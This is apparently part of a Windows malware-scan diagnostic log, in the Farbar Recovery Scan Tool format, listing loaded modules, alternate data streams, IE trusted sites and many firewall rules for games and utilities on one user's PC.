2014-06-03 16:18 - 2014-06-03 16:18 - 00336752 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiMalwareEngine.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00212336 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiRootkitEngine.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00509808 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScannerHistory.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00610144 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScanner.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00035192 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_timer-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00326000 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScannerScheduler.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00453496 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareRealTimeProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00227688 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareIncompatibles.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00218976 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiSpam.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00171368 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiPhishing.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00786800 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareParentalControl.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 01936744 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareWebProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00422256 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareEmailProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00650608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareNetworkProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00358744 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwarePromo.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00298336 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareFeedback.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00371576 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareThreatWorkAlliance.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00154464 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\SecurityCenter.dll
2011-09-03 19:31 - 2013-04-20 19:04 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2014-07-16 11:06 - 2014-07-16 11:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 07715160 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe
2014-06-03 16:18 - 2014-06-03 16:18 - 00500088 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_locale-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00364896 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\HtmlFramework.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00066904 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\DllStorage.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00803696 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTrayDefaultSkin.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00139608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\Localization.dll
2013-08-02 17:13 - 2013-01-04 17:04 - 00147456 _____ () C:\Program Files (x86)\Standard Mouse Driver\Monitor.EXE
2011-11-11 15:07 - 2011-11-11 15:07 - 00265240 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2011-08-12 13:19 - 2011-08-12 13:19 - 00680984 _____ () C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
2014-07-16 11:05 - 2014-07-16 11:05 - 05558432 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 13:05 - 2014-10-11 13:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-06-20 06:29 - 2015-06-03 17:06 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2010-05-07 18:35 - 2010-05-07 18:35 - 02143576 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2010-05-07 18:35 - 2010-05-07 18:35 - 07954776 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2010-05-07 18:36 - 2010-05-07 18:36 - 00340824 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2010-05-07 18:37 - 2010-05-07 18:37 - 00027480 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2010-05-07 18:37 - 2010-05-07 18:37 - 00126808 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2013-08-02 17:13 - 2012-12-20 14:05 - 00045056 _____ () C:\Program Files (x86)\Standard Mouse Driver\lan.dll
2013-08-02 17:13 - 2012-08-30 14:24 - 00061440 _____ () C:\Program Files (x86)\Standard Mouse Driver\hiddriver.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 32733056 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libcef.dll
2012-07-23 15:10 - 2012-07-23 15:10 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 00742784 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libglesv2.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 00136576 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows\system32\EP9B90ED:ARTISAN 830
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\.DEFAULT\...\freerealms.com -> freerealms.com
IE trusted site: HKU\.DEFAULT\...\soe.com -> soe.com
IE trusted site: HKU\.DEFAULT\...\sony.com -> sony.com


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{D51AE41D-5927-4392-853D-0905F092E3F1}] => (Allow) C:\ProgramData\NexonUS\NGM\NGM.exe
FirewallRules: [{BF4ECB20-28CD-4A53-A725-A8308314B82E}] => (Allow) C:\ProgramData\NexonUS\NGM\NGM.exe
FirewallRules: [{71057DFB-1576-4A31-8FAD-CE735A33D9EC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{05A046EB-FE34-450E-A1F9-95C2C6A79C54}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{8B783A98-2484-4B5B-A6AF-6476C343C2F8}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{943A64F6-98BB-4AA6-9F22-77C3BDA084C0}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{C0A85823-0FA9-483F-B7A8-0FE8930260D6}] => (Allow) LPort=14531
FirewallRules: [{5454141A-D59B-4D32-99C5-CA24EDE4C73F}] => (Allow) LPort=14531
FirewallRules: [{904B5B64-8F2F-429E-87BE-AFA706FE24E4}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{AFB4BD34-A61C-4E34-8088-D768CEA67EA8}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{FFA339A5-5FA6-45B2-8413-8B67C86BFC6F}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.exe
FirewallRules: [{037A2E3C-824C-4E9F-A004-0D7E6CBC3B36}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.exe
FirewallRules: [{F865E764-BE54-4098-A6D0-B8AE9F66D6FA}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.patch.exe
FirewallRules: [{55A32708-A020-4379-AC67-3DA07416A3D9}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.patch.exe
FirewallRules: [{1A09075C-65BD-4A4E-89BF-DA3E929B61EF}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{08EB0615-A41B-4652-8CEB-CE51B9FF40AE}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{522DC7DD-CC96-4CAE-BE0B-0C11695712B7}] => (Allow) LPort=14531
FirewallRules: [{CCE0DC87-FE8D-4423-BD90-9BAC5037D1F4}] => (Allow) LPort=14531
FirewallRules: [{89A49994-4F07-4AE2-9D78-A97593A97ECF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{94E95B95-7294-4CA2-85B6-21632F7FDEDD}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [UDP Query User{C40DC927-9C1E-479E-A57F-289A9C3AFE9F}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [TCP Query User{488275FE-D29B-4C21-8010-4BDF61FDC9BF}C:\users\user\desktop\vindictus\en-us\vindictus.exe] => (Allow) C:\users\user\desktop\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{91070D6C-E6FD-4665-9172-A1D0A57623A3}C:\users\user\desktop\vindictus\en-us\vindictus.exe] => (Allow) C:\users\user\desktop\vindictus\en-us\vindictus.exe
FirewallRules: [{B53291FE-0BA5-4515-857E-72DD27736BD8}] => (Allow) C:\Users\User\Desktop\Vindictus\en-US\NMService.exe
FirewallRules: [{41FB5650-07A2-42BD-BBFB-EBA0C54611D4}] => (Allow) C:\Users\User\Desktop\Vindictus\en-US\NMService.exe
FirewallRules: [TCP Query User{447F6735-0804-480C-A124-23440337B031}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [UDP Query User{A0B80899-8D79-417F-9E49-BDFD06293053}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [TCP Query User{9AD58473-C859-479F-BB5A-B34C5F6BEA69}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{8339AAF9-D84A-4E56-9E74-7EE58E283263}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{530EAC13-9FD8-4FF2-8F85-73A90C35ACA9}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{4D31D5FC-CB48-47E3-823D-54EC69BDEEF7}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4DDFDFE6-33A3-43F4-907B-7616FCBFC6C7}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\PbLauncher.exe
FirewallRules: [{FA07473F-E743-4509-9DC0-863885D07737}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\PbLauncher.exe
FirewallRules: [{D44AB82D-EA24-4B9B-A816-CD874794608A}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\pbclient.exe
FirewallRules: [{7FA8D1CB-3F2F-44F4-BBB4-6E07839429A8}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\pbclient.exe
FirewallRules: [TCP Query User{357A3BE6-8FE8-4754-9BFB-2E8C0A3DC9B1}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{D8104418-51EF-4019-B7C4-B7E01E699538}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [{2FF4BC53-31A4-4600-A303-3EE13D79EF89}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{43C06013-A01B-40D5-9C7D-62BD989D0516}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{D422C0D1-6C58-4D7A-9530-60AC03F06F5D}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Config V3\ENConfig.exe
FirewallRules: [{5D1C574B-CE8A-4733-971E-AED5A91C5EF6}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Config V3\ENConfig.exe
FirewallRules: [{B94F48B1-E360-479E-A954-BA377D3023D6}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{E8590ADE-8E0C-4A8A-805B-E6DC1C40D141}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{4DDCF984-083A-48FF-88C1-3CE70AC5E7BC}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{7CFC30F2-7792-4A72-B152-97C50ED5F9D4}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [TCP Query User{78E82014-A085-4368-BABF-91AE51EFEDD3}D:\common\driver update\edupdate.exe] => (Allow) D:\common\driver update\edupdate.exe
FirewallRules: [UDP Query User{90A74349-2585-418A-B5D2-8F2A2F7BE59B}D:\common\driver update\edupdate.exe] => (Allow) D:\common\driver update\edupdate.exe
FirewallRules: [{F897F84C-8B1C-44A6-97FA-14A3E0DE8F95}] => (Allow) C:\Program Files (x86)\Logitech\Vid\Vid.exe
FirewallRules: [{B6ED0B87-8FC2-4358-93F8-83D171354341}] => (Allow) C:\Program Files (x86)\Logitech\Vid\Vid.exe
FirewallRules: [TCP Query User{1A4103E8-5636-4B67-ADA8-38053E98C581}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2129DA3F-5F82-4BAF-BC0C-7E31012ABEC5}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{70E35DB8-0B22-4736-A555-11F0D8021632}C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe] => (Allow) C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{853EA7B6-3518-4699-AE1B-6A939CCEF878}C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe] => (Allow) C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe
FirewallRules: [TCP Query User{A25ECC8C-486F-40CA-8888-B8C4A3D13E73}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [UDP Query User{1A78765E-1DC4-480C-A6BF-2FEF30AA5E00}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [TCP Query User{BEBBDEA7-24E4-4D51-8E30-F12DB52E2637}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{80341F1A-8F3C-4148-906F-7E82A2D389FF}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{E20ABBD1-3575-41C2-8069-91C451455B1B}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{0667C9C4-928B-4043-BAC8-E4FDEA95A9CE}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [{F709ADE1-8823-4E42-B690-58909F7D5EC1}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{6C26375A-28FA-41BF-93D3-1B369451213A}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [TCP Query User{A564C33F-DF63-40AB-8A45-A8A632C7D5CE}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [UDP Query User{3A825E64-EB87-484C-AB25-32478D926C02}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [{F0DDEB3F-D2A2-4649-BE6A-3822FEBBED2B}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\RosettaStoneVersion3.exe
FirewallRules: [{60E1800A-A6CF-466A-8422-764F69D06560}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\RosettaStoneVersion3.exe
FirewallRules: [{572A2419-8DC9-4728-8BE0-E229B7C0BFD8}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\support\bin\win\RosettaStoneLtdServices.exe
FirewallRules: [{C43F63DA-0749-4EA5-8C02-BC8DEC47130E}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\support\bin\win\RosettaStoneLtdServices.exe
FirewallRules: [{67D8D9EE-5B19-4B86-9138-C4262811ABE3}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{06B3A72C-9A3A-40FD-98DA-A3F69CDC7A2F}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{DF6A711B-8DA5-471F-89DB-2167B3BDCF71}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{1190000F-14FD-484E-A707-6450C9B3DCDE}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{57FBB4B3-7310-4D7B-AA48-E8F4CD826FD5}] => (Allow) C:\Nexon\Combat Arms\NMService.exe
FirewallRules: [{16FBB531-F522-4628-99F0-59DF7A1AC58F}] => (Allow) C:\Nexon\Combat Arms\NMService.exe
FirewallRules: [TCP Query User{4368FDC4-BA09-40F1-8A59-F680331FC5C9}C:\nexon\combat arms\engine.exe] => (Allow) C:\nexon\combat arms\engine.exe
FirewallRules: [UDP Query User{BFE6AA55-1F5B-4065-9B2E-F07E167875F3}C:\nexon\combat arms\engine.exe] => (Allow) C:\nexon\combat arms\engine.exe
FirewallRules: [TCP Query User{A73F4D1A-D849-4AC3-BE7D-8A8765E5E097}C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe] => (Allow) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [UDP Query User{3DD9AF0C-CFD5-42D3-A79F-80C6F3853A3B}C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe] => (Allow) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{E2DCCC8A-13D6-4BF1-A38E-C22BBFC4B256}] => (Block) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{7E6E59EE-BC01-4F81-AE33-99F61D50CA2B}] => (Block) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{7334AEE3-C44A-40CF-AFE0-573219C1F0EE}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{FCDE9DF9-9C98-42F1-B113-4354E261C3E3}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [TCP Query User{9A9822DB-E1B1-4464-BAA8-32D7282C84FB}C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe] => (Block) C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe
FirewallRules: [UDP Query User{E053FA9C-A040-49BF-B9BD-50E40C0E3E7B}C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe] => (Block) C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe
FirewallRules: [{F8A7FB33-C9B5-4D95-9F0D-06E342F6C4BA}] => (Allow) C:\Program Files\SmartFTP Client\SmartFTP.exe
FirewallRules: [{14AB70C9-DF3D-4096-938A-F6A352488095}] => (Allow) C:\Program Files\SmartFTP Client\SmartFTP.exe
FirewallRules: [{EDF1BAA3-E96B-43E3-9F07-F06FCC564AF8}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{0EFCD0B9-6794-47B7-A9A4-234CFC38E857}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{73D92A7F-944F-45BD-B987-B53CDFB8E870}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{FD161729-BD8F-4443-BFA3-6902C812F0E5}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{CB0810E1-CBB3-47B7-A755-9C6060F85A8C}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{54BA54D2-CE93-405A-A5EF-9E154CD2ADF1}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{84302438-2B8F-49BC-A1C3-8F06884C4EE1}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{0A772D59-27F5-4CBB-9ECF-E2A8BE6AE3C4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{D0AC3DA0-E804-4DC5-A404-AFC3CD504F3E}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{80673578-8D70-4503-A4ED-8C97EF116CC4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{E9522D9D-DF93-4CF3-8D1A-DEEDF8F1A494}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{178080E2-DF8D-4469-8418-B4F15A6A9B91}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{65A3C4EA-6A0A-4723-A049-2CD7E5F1A0A4}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{C703BF2A-8D5F-4B08-B981-0F8AEED9F4E2}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [TCP Query User{B7B59FF9-E96D-4FA9-9122-A1E7A3B3E612}C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe] => (Allow) C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe
FirewallRules: [UDP Query User{DDFBF5C1-2623-4D4F-BF9E-B614B785EFD3}C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe] => (Allow) C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe
FirewallRules: [TCP Query User{6E21BC5B-CF80-46DC-BF74-FA4C27F2DFA0}C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe] => (Allow) C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe
FirewallRules: [UDP Query User{FC77E3FD-9F67-4407-ABF3-98E623476BA6}C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe] => (Allow) C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe
FirewallRules: [{8BA2E48B-E4E9-4514-BDA4-C53DC23428D3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.515\Agent.exe
FirewallRules: [{91340649-47E4-427E-B998-9B197619F7B6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.515\Agent.exe
FirewallRules: [{CD3802BE-3A65-43DA-BAC5-836CD844A58C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.868\Agent.exe
FirewallRules: [{47E48EA3-7162-4720-A0D9-896CC4FE3B0C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.868\Agent.exe
FirewallRules: [{2E9988E8-A0BD-4915-A75A-C5BD5FB91E73}] => (Allow) C:\Program Files (x86)\Diablo III Beta\Diablo III.exe
FirewallRules: [{3D3ECDBD-CE3B-4975-A65C-91F01CCE639E}] => (Allow) C:\Program Files (x86)\Diablo III Beta\Diablo III.exe
FirewallRules: [{B21A5FD2-8C7B-47AE-8129-4F53366719EF}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{C1530BA2-B10C-4667-99F6-9A6C1EAC8902}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{D90840D3-3C93-4C96-81F5-7E267FD7CCB3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{E0A66101-60EE-4184-AD8C-0AF107B26180}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{AF18065E-B9E3-40F9-AE22-153A6AAB2B3F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{209C6096-5912-48F7-9C0B-C6122FC1C666}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{3144EBE9-E914-46BA-BCA6-DBA9EFE2F1A7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{D8B68E6B-9DF8-4FAD-9258-62B31D1AE4F3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{6318BEB2-4361-444F-9331-B684FE350F5E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe
FirewallRules: [{AEBCC558-36F1-45F7-B815-DF079716DC77}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{BB63B462-7383-4FA5-98D3-EA56F9A057D1}] => (Allow) C:\Program Files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe
FirewallRules: [{AF30ED01-7075-446B-80A5-E57BD79739AA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqsudi.exe
FirewallRules: [{2A8DB980-B805-4A72-AD7B-3F9113FE93CD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpsapp.exe
